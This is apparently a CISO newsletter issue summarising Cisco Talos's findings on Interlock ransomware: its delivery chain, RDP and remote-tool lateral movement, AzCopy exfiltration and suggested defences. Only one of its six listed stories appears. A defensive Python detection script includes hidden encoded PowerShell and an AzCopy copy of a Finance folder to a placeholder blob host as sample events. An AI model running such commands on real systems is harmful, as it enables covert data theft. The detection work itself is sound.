CISO Intelligence for 11th November: Premium Edition
Table of Contents
- Attack of the Clones: Interlock Ransomware Unwrapped by Cisco Talos
- Silent Skimmer Returns: A 'Shhh' With a Bang
- The Mythical BlueNoroff Strikes Again: Mac Users Beware!
- Attackers Leverage DocuSign's Trust to Send Deluge of Fraudulent Invoices
- Russian Bears Bargain: Tech for Troops with a North Korean Twist
- Phantom Menace: An Extortionist's Demand from AT&T
Attack of the Clones: Interlock Ransomware Unwrapped by Cisco Talos
Board Briefing
Cisco Talos revealed a new risk in the ransomware landscape with the emergence of Interlock ransomware. This threat utilizes various multifaceted components for infiltration and is suspected to be linked to the notorious Rhysida operators. Immediate prioritization of strengthening network defences, especially against Remote Access Tool and RDP vulnerabilities, is recommended.
CISO's Challenge to the Team
- Conduct a comprehensive review of current remote access protocols and establish reinforced safeguards particularly against RDP and RAT usage.
- Identify and mitigate any potential vulnerabilities stemming from PowerShell scripts and credential stealers, ensuring swift detection and containment.
Supplier Questions
- How effectively can your solution detect and block unauthorized use of remote desktop protocols and tools like AnyDesk and PuTTY?
- What enhancements can you offer for real-time monitoring and alerting of suspicious Azure Storage blob activities?
CISO focus: Threat Intelligence and Incident Response
Sentiment: Strong Negative
Time to Impact: Immediate
Watch out, the Interlock is picking locks; it's not a locksmith but rather a deft cyber thief.
The Reveal
Cisco Talos has unveiled a troubling addition to the ransomware landscape with the emergence of Interlock ransomware, underscoring the persistent and evolving threats posed by cybercriminal entities. Interlock, which Talos suggests might have roots in the Rhysida ransomware syndicate, has surfaced as a significant challenge to enterprise security architecture, demanding immediate action from cybersecurity teams.
Anatomy of an Attack
Interlock is distinguished by its comprehensive delivery chain, which comprises multiple malign components—each playing a crucial role in the lifecycle of the attack. The intrusion begins with a Remote Access Tool (RAT) that masquerades as a benign browser updater. Once inside, the operators deploy PowerShell scripts and other malicious tools, including a credential stealer and a keylogger. This chain of malicious activity sets the stage for the pivotal step: deployment of the ransomware encryptor binary.
Here's a breakdown of the attack vector pipeline:
- Entry Point: The initial access point leverages social engineering tactics—a RAT cloaked as a browser update.
- Establish Foothold: PowerShell scripts are used to move through the network and maintain persistence.
- Credential Harvesting: A bundled credential stealer collects and relays sensitive access data.
- Data Gathering: Keyloggers intercept keystrokes, further magnifying the threat to the victim's data integrity.
- Execution and Encryption: The culminating ransomware is deployed, causing widespread disruption and data encryption.
Lateral Movement and Data Exfiltration
One of Talos's key observations concerns how the attackers move laterally within networks. Remote Desktop Protocol (RDP) stands out as the favored mechanism for these threat actors, enabling them to leap between network nodes with surprising ease. Complementary tools such as AnyDesk and PuTTY serve as auxiliary channels, expanding the potential vectors for deeper infiltration.
To compound the damage, Interlock operatives utilize Azure Storage Explorer—a mechanism reliant on the AZCopy utility—for siphoning data to a secured attacker-controlled cloud blob. This technical maneuver allows for sizeable data loads to be covertly exfiltrated, heightening the stakes for affected enterprises both legally and operationally.
Timeline of Mayhem
Cisco Talos estimates the average time from initial compromise to full encryption at approximately 17 days, a window in which many organizations may remain unaware of the intrusion until it is too late. This underlines the critical need for rapid detection, response, and remediation capabilities to minimize the exposure window.
Possible Origins and Connections
Interestingly, Talos posits that Interlock ransomware may have evolved from the notorious Rhysida ransomware operation. This assessment, made with low confidence, is based on overlapping tactics, techniques, and procedures (TTPs) and on similarities between the ransomware binaries.
Defensive Measures and Strategic Focus
In response to the Interlock threat, we propose the following defensive measures:
- Prioritized Asset Protection: Restrict and monitor access points linked to RDP, implementing multi-factor authentication where viable.
- Heightened Detection Systems: Deploy increased monitoring around PowerShell script executions to detect anomalies.
- Credential Management: Bolster infrastructure against credential harvesting through enhanced encryption and access controls.
- Exfiltration Alerts: Activate stringent logging and real-time alerts for Azure Storage Explorer activities to deter unauthorized deployments.
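To make the detection items above concrete, here is an added example (not code from Cisco Talos or this newsletter) that scores constructed Windows-style events for the tradecraft described: RDP logons, AnyDesk/PuTTY launches, hidden or encoded PowerShell, and AzCopy copies to an Azure blob endpoint. The event field names, tag weights and alert threshold are assumptions for illustration, not a vendor schema.

```python
"""Host-scoring detection sketch for the Interlock chain described above."""
import re
from collections import defaultdict

# Tooling the report names as lateral-movement and exfiltration aids.
REMOTE_TOOLS = {"anydesk.exe", "putty.exe"}
EXFIL_TOOLS = {"azcopy.exe", "storageexplorer.exe"}
# AzCopy writing to an Azure blob URL is the exfiltration signal to watch.
BLOB_RE = re.compile(r"https://[\w.-]+\.blob\.core\.windows\.net/", re.I)
# Encoded or hidden PowerShell invocations are a common staging tell.
PS_SUSPICIOUS_RE = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring", re.I)
# Assumed weights: exfiltration alone is enough to alert; the rest accumulate.
WEIGHTS = {"rdp_logon": 1, "remote_tool": 2,
           "suspicious_powershell": 2, "blob_exfil": 5}

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"host": "ws-01", "type": "logon", "logon_type": 10,
     "user": "svc-backup", "src": "10.0.0.5"},
    {"host": "ws-01", "type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgA..."},
    {"host": "ws-01", "type": "process", "image": "anydesk.exe",
     "cmdline": "anydesk.exe --silent"},
    {"host": "fs-02", "type": "process", "image": "azcopy.exe",
     "cmdline": "azcopy.exe copy D:\\Finance "
                "https://placeholder-acct.blob.core.windows.net/c --recursive"},
    {"host": "fs-02", "type": "process", "image": "notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]


def classify(event):
    """Return the detection tags one event triggers (empty list if benign)."""
    tags = []
    # Logon type 10 is RemoteInteractive, i.e. an RDP session.
    if event["type"] == "logon" and event.get("logon_type") == 10:
        tags.append("rdp_logon")
    if event["type"] == "process":
        image, cmd = event["image"].lower(), event.get("cmdline", "")
        if image in REMOTE_TOOLS:
            tags.append("remote_tool")
        if image == "powershell.exe" and PS_SUSPICIOUS_RE.search(cmd):
            tags.append("suspicious_powershell")
        if image in EXFIL_TOOLS and BLOB_RE.search(cmd):
            tags.append("blob_exfil")
    return tags


def score_hosts(events, threshold=3):
    """Aggregate tag weights per host; return hosts at or above threshold."""
    per_host = defaultdict(lambda: {"score": 0, "tags": []})
    for ev in events:
        for tag in classify(ev):
            per_host[ev["host"]]["score"] += WEIGHTS[tag]
            per_host[ev["host"]]["tags"].append(tag)
    return {h: v for h, v in per_host.items() if v["score"] >= threshold}


if __name__ == "__main__":
    for host, v in score_hosts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: score={v['score']} tags={v['tags']}")
```

Correlating the tags per host matters because a single RDP logon is routine; the combination of RDP, a remote-access tool and hidden PowerShell on one workstation, or any AzCopy push to a blob from a file server, is what should page the responder.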
Staying Ahead in the Cyber Game
As this newest threat unfolds, organizations are reminded of the relentless invention and adaptability characteristic of cyber attackers. The emergence of Interlock underscores the importance of remaining vigilant and proactive, constantly evolving security postures to safeguard sensitive enterprise assets against these evolving threats. In the world where digital locks are constantly picked, staying a step ahead is not just advisable but essential for survival.